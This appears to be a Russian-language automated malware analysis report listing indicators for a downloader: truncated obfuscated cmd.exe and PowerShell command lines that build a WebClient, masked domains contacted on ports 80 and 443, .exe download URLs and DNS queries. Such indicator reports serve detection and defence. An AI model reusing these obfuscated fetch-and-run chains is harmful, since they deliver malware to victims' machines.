Техническая информация
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %wwHHYUcSQFKmKaQ%=jTiEnrzUA&&set %uabSAfsGF%=owe^r^s&&set %TRJwOjmUwjvIzDX%=iVLWSdrwa&&set %cnqTWliaD%=p&&set %...
- 'se####daaron.com':80
- 'se####daaron.com':443
- 'af#####reatividad.com':80
- 'af#####reatividad.com':443
- http://se####daaron.com/hxbwepq.exe
- http://af#####reatividad.com/fhjxcit.exe
- 'se####daaron.com':443
- DNS ASK pa####narecados.com
- DNS ASK mo#####ngineering.co.za
- DNS ASK se####daaron.com
- DNS ASK af#####reatividad.com
- DNS ASK di###iavi.net
- '<SYSTEM32>\cmd.exe' wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %wwHHYUcSQFKmKaQ%=jTiEnrzUA&&set %uabSAfsGF%=owe^r^s&&set %TRJwOjmUwjvIzDX%=iVLWSdrwa&&set %cnqTWliaD%=p&&set %...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " (' (53h .( sITenV:PUbLIC[13]+sITeNV:PuBLic[5]+hOmXhOm) 53h+5'+'3h'+'((hOmrHIhOm+hOmfhOm+hOmran'+'c = hOm+hOmnew-ohOm+hOmbject System.hOm+hOmNethOm+hOm.WehOm'+'+hOmbChOm+h'+'Omlient;rhO'+'m+hO...